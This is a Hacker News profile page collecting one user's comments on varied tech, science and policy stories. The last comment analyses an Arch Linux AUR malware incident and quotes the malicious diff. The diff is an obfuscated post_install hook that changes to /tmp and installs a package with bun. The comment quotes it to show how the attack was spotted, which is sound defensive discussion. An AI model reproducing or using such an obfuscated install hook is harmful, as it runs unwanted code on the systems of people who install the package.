HNHacker News
TopNewBestAskShowJobs

cge

1,877 karma · joined May 2, 2012

submissionscomments
cge··on Woman Arrested, Dragged Away After Speaking About Flock at City Council Meeting
If the attendee's description is true and the video is not missing context, then that doesn't appear to be what happened. Interpreting her description and the video, during the public comment period for an unrelated topic, she went through the usual process for giving a public comment, started her completely off-topic written statement, then was arrested during it a few seconds after two attempts by the council to interrupt her, during which she was flipping off the council.

If she was within her allotted time for a comment that was completely off-topic but otherwise complied with the public comment process, and her flipping off the council was, as she claims, only after it was clear that she was going to be interrupted by the police, then that does seem different than actually interrupting the discussion or refusing to leave.

cge··on HERMES radio enables voice and data communication over vast distances
>the US rules are that you can use digital protocols but you must publish the specs so anyone can, in principle, decode the signal.

This restriction does not appear to actually be enforced, eg, if I recall correctly the VARA HF/FM modes do not have published specs anywhere near sufficient to decode them, to the point where there are projects trying to reverse engineer them.

cge··on Science Is Open Software
I try to do something like this with my publications, and encourage others to. My goal is to have the pipeline from raw data to complete figures and manuscript in a repository, with cached data for computationally expensive analysis and for stochastic simulation results, and the option for the user to just use those or run the full pipeline, with or without the same random seeds. I just make clear that the code was run-once code and is going to be messy compared to code refined over time and diverse uses. I generally use Zenodo to a GitHub repo, however, in case GitHub decides to do something bad in the future. Making sure things run far in the future can also be a challenge. Sure, you can use a container: will the base of that container be available in 30 years?

And with that said, for experimental work, this approach does not make things fully reproducible; it only makes the analysis reproducible. There are always factors that influence experiments: research is by definition at the edge of our understanding, and reality has countless variables, including ones no one has thought of, known about or thought important.

cge··on How Fairphone built the Fairphone Gen 6+
When I had a Fairphone 4, regulars on the community forum repeatedly reminded everyone that repairability was not a primary goal of Fairphone, ethical consumerism was, and any longevity and repairability was secondary or coincidental.

Yes, that goes against most of Fairphone's own advertising, but it was consistent with my experience of the phone and discussions on the forum: security updates frequently so far out of date that some software could not be run, flimsy components inconsistent with advertising (yes, the battery was nominally swappable, but the snaps on the back would break easily, and support would claim that it was not intended to be removed regularly), parts that were frequently out of stock, and of course, whole new phone designs every generation rather than Framework-like component upgrades.

It seems like they may have improved since then, but those problems, along with the atrocious security (FP4 used AOSP's public test signing keys, with publicly-available private keys, for its firmware) and sketchiness around specs, standards and openness (especially for the camera), generally turned me off the company.

cge··on LLM Judges Verify Presence, Not Absence: Omission Blindness in AI Clinical Notes
The entire paper is almost certainly Claude-generated, given the clear Claude-speak throughout. It seems like they didn’t even try to have Claude write a polished paper: it reads like Claude writing up a lengthy report, down to the needless sectioning with idiosyncratic title language. There appears to be no disclosure, and the author contribution section appears to falsely claim that a particular author wrote the text.

I know arXiv has taken some measures to combat spam like this, but it seems like they’ll need to do more. There’s just very little barrier now to creating giant slop papers like this and then dumping them anywhere that won’t reject them. It is an insult to everyone’s time, and I can’t imagine they expect people to actually read this. If the expectation is that everyone will use an LLM to interpret it, then maybe they should have at least had a few more rounds of tightening and polishing the paper, even via LLM, to save the redundant token use.

cge··on Credit Card Rewards Became a $9.2B Wealth Transfer
It's just such a bizarre choice that one might hope there would be another interpretation. Why measure a percentage change on sales tax, which varies heavily from location to location, and is not what the associated fees are based on, rather than simple choice of total cost?
cge··on Credit Card Rewards Became a $9.2B Wealth Transfer
The only way I can interpret the percentage is that they are stating the increased cost as a percentage of sales tax rather than a percentage of the sale, such that "26% higher sales tax" in a state changing 10% sales tax would mean paying 2.4% more in total. That choice seems misleading, but does make the percentage make sense.
cge··on Why some US restaurants are banning tips
That’s also very common in the UK, and shows up elsewhere in Europe sometimes. In the UK, they are legally but not practically or socially discretionary. There are some tax advantages for the restaurant and in the ideal case for staff.
cge··on Bringing the cybersecurity capabilities of Claude Mythos 5 to more defenders
>In a world where things such as GLM-5.3, DeepSeek-V4-Pro-0813, and Kimi-K3 exists, this is a bit laughable.

This is not just for security, too. Using Fable for anything that could be remotely construed as being connect to chemistry or biology was impossible until a few weeks ago. Now it is slightly better, but still fails on many completely innocuous projects.

So as other models advance, Anthropic's sole frontier offering to entire academic fields remains an Opus that seems to get worse in capability each release. They're starting to become a joke in my field: at a conference a few weeks ago, one presenter laughed when I asked about his use of Fable and pointed out that it would downgrade if the letters 'd', 'n', and 'a' were anywhere near each other, which is not that far from my experience.

cge··on Judge sets framework for Nine PBS to retrieve archival data
For some reason, despite these things being rather simple and concrete distinctions, all the reporting around the case keeps being confusing, vague, and contradictory. I had been rather convinced by the Ars Technica article [1] that Iron Mountain was just the data center operator and this was colocation of completely OSS-owned and managed equipment. Iron Mountain's statements there certainly seem to say that. There's the complexity here that, in general, Iron Mountain does apparently provide both data storage, and colocation.

[1]: https://arstechnica.com/information-technology/2026/08/pbs-s...

cge··on RustDesk now supports true unattended remote access on Wayland
They comment years after immediately closing the bug as wontfix, vaguely talk about users for expressing interest in features while not being willing to open a PR, when people in the thread had actually been asking, over a long period of time, whether they would accept a PR or were just opposed to the feature outright, and say they would welcome community contributions even though they think the feature is unnecessary. Then they immediately lock the issue and delete at least one comment.

I certainly interpreted the response as meaning that anyone actually trying to implement the feature would find the PR an exercise in frustration. It may be there were some cultural confusions about context and implication, but considering that they locked the issue, people weren't exactly encouraged to ask for clarification. And the developers have a sketchy enough reputation already from other incidents.

cge··on London Underground begins scanning passengers' faces
As an illustration of this, 100% of the detections in the trial in 2026 have been false positives. Scanning tens of thousands of faces for each deployment, they’ve had exactly one detection, which was false:

https://www.btp.police.uk/SysSiteAssets/media/images/british...

cge··on France to ban unsolicited telemarketing calls
I think the point is that there is a distinction between calls that are intrusive spam or arguably scams but not already illegal, and calls where the content of the call is itself unambiguously illegal.

Bans on unsolicited calls, or do-not-call lists, can be effective for the former, as it moves the behavior from being legal to being illegal, while for the latter, they are already breaking laws, often in a more severe way, and technical measures or enforcement are more important.

A phone company trying to trick someone into paying more per month for something they don't need is likely to be worried about being fined if caught calling a number on a do-not-call list. A scammer pretending to be the tax office and demanding payment of supposedly unpaid taxes is going to be in trouble if caught regardless of rules about what numbers can be called.

cge··on Increasing the lifespan of a bulb makes it worse in every other way
While the author mentions that they are not trying to defend the Phoebus cartel, I think they may inadvertently be somewhat misleading in their explanation. What they are saying is, from an engineering standpoint, true. But my understanding of the argument against the Phoebus cartel is that it was using legitimate engineering points as the official justification for profiteering business collusion: that the points were real, but were not the actual reasons for their decisions, or reasonable justification for the particular choices of values they enforced.

In doing so, the article perhaps obscures the point that business collusion, I expect, is more often built around legitimate reasoning taken to illegitimate extents and conclusions, than around outright fabrications.

cge··on GCC steering committee announces AI policy
Without wanting to take a stance on either side of these arguments, it does occur to me that, for this and other major FOSS projects deciding on AI policies, others can always start forks with different policies. The success or failure of such forks might even offer some insight into how helpful or harmful different forms of AI use are, at least from a programming perspective.
cge··on Opus 5 is currently #1 on Artificial Analysis Intelligence Leaderboard
There’s confusion about the classifiers on Fable. They don’t ban chemistry and biology topics they flag as a potential risk, they ban anything related to chemistry or biology at all. This is intentional, and directly stated on the model card, but seems so absurd that there can be assumption it must be a misreading.

Being a researcher somewhat connected to chemistry and biology, Fable has been the most useless model I have ever tried. Essentially all work has instantly downgraded to Opus.

cge··on Codeberg Divides
Asking about this, it seems like that might be the case: they likely intended the "even if they were not LLM-generated" to be counterfactual. It's an unfortunate place to leave such grammatical ambiguity.
cge··on Codeberg Divides
>And for what it's worth, it seems like they only care if the project is directly crypto related (e.g if you had a repo directly implementing a Monero node, that would probably not be allowed).

Looking at community conversations, there actually seems to be little clarity over this, and quite a bit of confusion. Several established members of the community seem to be saying that the ToS actually only bans "cryptocurrency related projects" that "[harm] the reputation of Codeberg", and that direct cryptocurrency projects that don't harm Codeberg's reputation are actually allowed, saying that the current banner is a mistake and is in the process of being changed (while they have their own systems and are not on Codeberg, I'm guessing GNU Taler might be an example of a cryptocurrency project that would be allowed). In fact, this appears to be within the official interpretation used when locking the discussion thread on the change ([1] refers to [2]).

[1] https://codeberg.org/Codeberg/org/pulls/1254#issuecomment-19... [2] https://codeberg.org/Codeberg/org/pulls/1254#issuecomment-19...

cge··on Codeberg Divides
Honestly, for me, both.

While I can't find something specific about it in the new ToS, the new blog post notes that "side projects and experiments", and "specific tools and custom scripts that would be unlikely to find a community anyway" are "discouraged", but are "tolerated in practice" if they only use minimal resources. This is stated as being regardless of LLM use. So some of my repositories are apparently already borderline in the community's opinion (it's not clear how they judge use of resources, but I only use self-hosted runners).

But there also seems to be an increasing sense that many active members see Codeberg as a space for a particular type of FOSS, within a particular, normative view of what development and communities should look like. This ties into the "side projects and experiments" comment, and to the general tone of the AI blog post on what they want Codeberg to be and not be. The point about "projects with a single developer and virtually no users", about "large ghost projects", and so on, are within the context of AI, but are derided in a wider sense.

Some of my repositories look like single developer experiments with no users or community, but aren't. I'm ultimately a scientist, not a typical developer; users typically communicate by email and at conferences, and cite my software and associated papers in their papers rather than starring repositories on forges.

And yes, much of the discussion around these questions often falls into the argument that projects that are good will be fine, because they'll be accepted despite the rules, and that any concern about specifics is unwarranted. But I can't know that I won't be targeted by Codeberg having an increasingly normative view of what 'proper' community development looks like.

(Yes, I realize I'm free to use something else. I'll likely end up moving my repositories off Codeberg and onto some combination of my own Forgejo instance and Github. The lack of federation in Forgejo heavily penalizes not being on a major instance, however. Meanwhile, as much as I encourage using DOIs for citations rather than URLs, people often do the latter, so staying on an instance that might decide to ban my projects can create lasting problems: one of my whole reasons for starting to migrate to Codeberg was because it seemed organizationally stable.)

cge··on Show HN: Analog Watch
That's just presenting improvements to a mechanism; while it isn't common, particularly for watches, and I don't know much about earlier examples, they do seem to exist.

For clocks, however, there is the iconic Swiss railway clock [1], which dates back to 1944 and has a jumping minute. For those, however, the jump is actually meaningful in itself, in they're synchronized by a master clock that has a one minute impulse, and the jump is actually the moment of the impulse.

[1]: https://en.wikipedia.org/wiki/Swiss_railway_clock

cge··on EU's five regulations that will change how we live, drive, and use the internet
One of the significant problems with systems like automatic speed limits (and lane following, etc) is that they need to work well, and reliably, in all conditions, or they end up posing safety risks themselves. Potentially worse, the implementations often make assumptions based on affluent, developed, modern urban areas, while being implemented everywhere, and so end up being something between a nuisance and a safety hazard in less developed, less modern, and more rural areas.

Driving a rather new car with speeding warnings around the deep French countryside a few weeks ago, for example, when on a motorway, with a speed limit of 130 km/h, the car would repeatedly detect the speed limits on exits, which could mean the car suddenly thinking that the speed limit was 50 km/h until the next 130 km/h reminder sign. Fortunately, the car simply beeped incessantly, and so only posed a minor safety risk in being distracting (the beep could be turned off temporarily, but the override was unreliable). Off the motorway, small roads around ancient towns were often designed with the expectation that drivers would need to frequently drive across lines, so the lane-departure mechanism would frequently engage to try to push the car off the road, or into oncoming traffic (which might be a tractor itself significantly over the middle line out of necessity), though it was fortunately weak enough that it was easy to counteract. And on winding, tight streets in towns, the car's speed limit detection was often significantly wrong, in both directions.

A car, in the middle of 130 km/h traffic, that decides it needs to abruptly slow down to 50 km/h, ending up as essentially a road hazard with cars that could run into it at 80 km/h relative speed, is probably also a serious safety threat, and a system that did that would also threaten your kids' lives.

One might hope that consistent implementation of these sorts of systems would force a realization that they need to work in all places, and that the infrastructure in those places needs to be able to support them reliably. But what I see more often (not just in the EU; the US has similar problems) is that the systems work quite well in areas that 'matter', little is done to improve them in areas that don't (to be fair, sometimes local governments are at least partially at fault for this), the people who live in those areas are forced to deal with systems that seem harmful to them, and the result is an increasing political discontent.

cge··on Camera with transparent display launches for the equivalent of $29
A perhaps similar sort of finder existed on a number of older (eg, first half of the 20th century) cameras, usually as a secondary option or an accessory, for quick shots. They tend to be common additions built into waist level finders because WLFs are slow to use and adding them is cheap; there’s one on the 1939 Praktiflex, as a random example, an early 35mm SLR with a pretty tiny WLF as its primary viewfinder.

Those usually work by having two square windows, the back larger than the front: you know you are looking at them the right way when they line up. They’re very approximate, but they’re meant to be.

Here, the camera has a thickness that is obscured by the face-on photos of it, so I expect it works by a similar principle: if you see the sides of the inside of the screen, you’re misaligned.

cge··on Organic Maps
That would be interesting to try, but unfortunately, at least on iOS, it’s region-locked by account region, so as someone who goes back and forth between the US and Europe often, despite being in Europe, I’m entirely unable to install it at all without making significant changes to my Apple account.
cge··on Leaking YouTube creators' private videos
On the one hand, the developers who were ultimately tasked directly with building Horizon were completely unqualified to write an accounting system, and lacked even basic knowledge about accounting in general, including fundamental misunderstandings about the very nature of double-entry and ledger-based accounting. From what I can remember from released correspondence, for example, Horizon had fundamental design mistakes that made it essentially not double-entry, particularly when multiple terminals were involved, even when not considering remote changes to accounts.

On the other, the severity of the consequences of the bugs in Horizon came from the behavior of Fujitsu management, the Post Office, and the judicial system, and I'm not sure that individual developers could have reasonably predicted that. The software was used under contracts that tried to make individual users personally liable even for shortfalls resulting from errors in the software. When accounts had shortfalls, the Post Office ignored even basic sanity in favor of insisting on Horizon's unerring accuracy. They abused esoteric powers of private investigation and private prosecution combined with their own vested interests to bring completely unreasonable prosecutions. They, along with parts of Fujitsu, repeatedly made false statements to courts about Horizon's basic operation, if often with enough distance from the actual developers to claim ignorance. The judicial system then operated under delusional and hubristic views on software development and practices around experts, witnesses, and coerced pleas that one might argue no reasonable person would have.

If a clearly negligent and unqualified engineer constructs part of an office building for a business with numerous avoidable tripping hazards that violate even basic standards, it seems reasonable that they might be liable for the injuries when employees trip on them. If it turns out that the business has a special right to shoot its employees with no consequences, decides that it would be better to shoot anyone who trips rather than admit to the building being fundamentally flawed, and then repeatedly has courts approve of its actions, I'm not so sure that the engineer should be held liable for mass murder.

cge··on FUTO Swipe – A new swipe typing model
To add to the license complexity, the model uses another FUTO-written license, though it at least does not seem as bad as the license for the keyboard:

https://huggingface.co/futo-org/futo-swipe/blob/main/LICENSE...

cge··on Renting a sewing machine from the library
These sorts of services do seem very dependent on the details of how they are organized.

I’ve had experience with two university libraries with 3d printers. They both advertise them similarly, and they were nominally similar services, ostensibly letting students and staff both 3d print and learn about 3d printing.

At one, the arrangement was that they’d show you around the machines, give you a link to a list of notes and rules, and then you could come in and use the printers. If you wanted to do something unusual or use an exorbitant amount of filament, they asked that you talk to them first. That service is what initially introduced me to 3d printing.

At the other, the library staff decided they’d rather handle everything themselves. You’d submit an stl, then they’d print it at some point, potentially weeks later. Random color pla only, no slicing and providing gcode or even requests for settings. In practice staff decided they would only accept links to popular stls online; submitting your own stl would be rejected. They printed at such bad settings that everything would come out horribly. The service was worse than useless, taught nothing, and may well have turned many students off 3d printing entirely, if they thought the results were indicative of what 3d printing could do. We essentially have to warn students that the service is not practically usable.

But both, of course, say they have 3d printers.

cge··on Google Hits 50% IPv6
> It would be awesome if they supported something like Hurricane Electric’s tunneling.

HE tunnel IP space is now sufficiently penalized as non-residential/office that I’ve had to turn it off anyway. YouTube, for example, largely seems to block users in HE space unless they are logged in, and I frequently ran into neverending captchas.

cge··on French physicist and media star loses doctorate after plagiarism investigation
For both me (physics) and my wife (history), in the American system, both at strong universities, most of our committee members read most of of our dissertations. For her, in a field where thesis by publication is not standard (your thesis is typically revised into your first book), her committee at the defense focused on questions and comments based on the committee's reading of the thesis more than on the actual defense presentation, which is apparently also normal in the field. In part, I expect that's because the thesis is expected to be built into something important post-PhD, and comments are seen as helpful in that process.

For me, it wasn't quite so apparent at the defense, and I don't know that all members read the final thesis carefully, but most of them had already seen me publish or present most of the research previously, often multiple times. I also know that some (and not just my advisor) did read the final thesis very closely. My thesis was only partially thesis by publication, however, which may have influenced this; it does now have a fair number of citations in its own right, which is somewhat unusual for the theses in the field, and potentially seen as awkward (it means there's significant work in the thesis that I never published elsewhere).

As a caveat, the American system (before current crises) does feel like it can have a two-tier system of PhD students who are expected to remain in academia (we both were) and ones who are not, even at strong universities. Expectations, and attention given, can vary considerably. The American system also tends to have larger and more closely involved committees than, for example, the UK/Irish system.

However, for the form of plagiarism discussed here: if someone had sentences from papers I published years ago interspersed in their work, and they weren't particularly notable sentences, I'm not confident I would notice. Depending on citations and what the sentences were, I'm not even sure I'd mind much, for example, if they were essentially copying a model definition.

cge··on Feds freaked over Fable 5 after 'fix this code', not jailbreak, say researchers
> Clearly with LLMs, bulletproof denials are ~impossible due to the way LLMs work.

As a scientist who repeatedly ran into the classifier-based denials: it appears Anthropic’s strategy to make denials more robust, at the cost of many false positives, was to have a separate classifier processing both input and output tokens, at an extremely simple, almost keyword-search level. One weakness of this approach is that it only catches things that use the right keywords: it is in some sense weak exactly where an LLM-based classifier would be stronger.

Work on abstract, closer-to-CS algorithms that used chemistry terminology were blocked immediately, while work directly relevant to chemistry/biology experiments, writing code to process images from a very specific microscopy setup relevant primarily to biological samples, was never blocked at all, because it happened to never use relevant keywords.

That’s consistent with this situation: finding and fixing bugs in the context of looking for bugs perhaps happened to never use words like ‘exploit’ or ‘cybersecurity’.

cge··on Arch Linux AUR Hit by Another Wave of Now More Sophisticated Malware Attack
The reported commit [1] suggests to me that it was an account compromise of some sort, not orphan+adopt: the committer is the same in git, but the contact email changes in the PKGBUILD.

This doesn't necessarily seem 'more elaborate': it is attempting to be better obfuscated against automated checks at the cost of being very obvious to anyone doing even a cursory review of the install scripts. It's also likely something that would be caught instantly by even an extremely naive LLM, as seems to have been the case here. There's simply no legitimate reason why an install script would ever do something like this:

  diff --git a/htbrowser-bin-deps.install b/htbrowser-bin-deps.install
  new file mode 100644
  index 000000000000..9806501accad
  --- /dev/null
  +++ b/htbrowser-bin-deps.install
  @@ -0,0 +1,3 @@
  +post_install() {
  +  $'\x63'"d" "/"'t'"m"'p' && "b"'u''n' 'a'"d"'d' $'\141\x6e''s'"i""-"$'\143''o''l''o''r'$'\x73' 'n'"e"'x'"t""f"'i''l''e''-''j''s'
  +}

[1]: https://aur.archlinux.org/cgit/aur.git/commit/?h=htbrowser-b...
Page 1 of 15Next →